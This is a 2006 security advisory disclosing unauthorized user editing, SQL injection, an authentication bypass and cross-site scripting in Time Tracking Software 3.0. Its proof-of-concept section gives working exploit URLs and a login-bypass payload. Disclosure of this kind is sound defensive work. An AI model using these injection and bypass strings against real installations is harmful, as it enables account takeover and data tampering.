Multiple Vulnerabilities in Time Tracking Software

Summary

Vulnerability
Multiple Vulnerabilities in Time Tracking Software
Discovered
2006.02.08
Last Update
2006.02.18 Exploitation code published
ID
EV0069
CVE
CVE-2006-0689 CVE-2006-0690 CVE-2006-0691
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched. No reply from developer(s)
Vendor
TTS Software
Vulnerable Software
Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php)
Version
3.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php) script.

1. Unauthorized data modification is possible.

Script edituser.php dont checks name and password and allows to modify data of any user.


2. Multiple SQL Injections

Most of user defined data isn't properly sanitized. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.


3. Cross-Site Scripting

UserName value in Registration Form is not properly sanitized. This can be used to insert arbitrary HTML or JavaScript code.

PoC/Exploit

1. Unauthorized data modifications.

http://host/timetracking/edituser.php?num=[userid]


2a. SQL Injection Example

http://host/timetracking/edituser.php?num=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*


2b. Authentication Bypass Example

Url: http://host/timetracking/login.php
Name: any
Password: ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*


3. Cross-Site Scripting Example

Url: http://host/timetracking/register.php
User Name: <XSS>

Solution.

Solution for "Multiple Vulnerabilities in Time Tracking Software" is not available. Check TTS Software website for updates.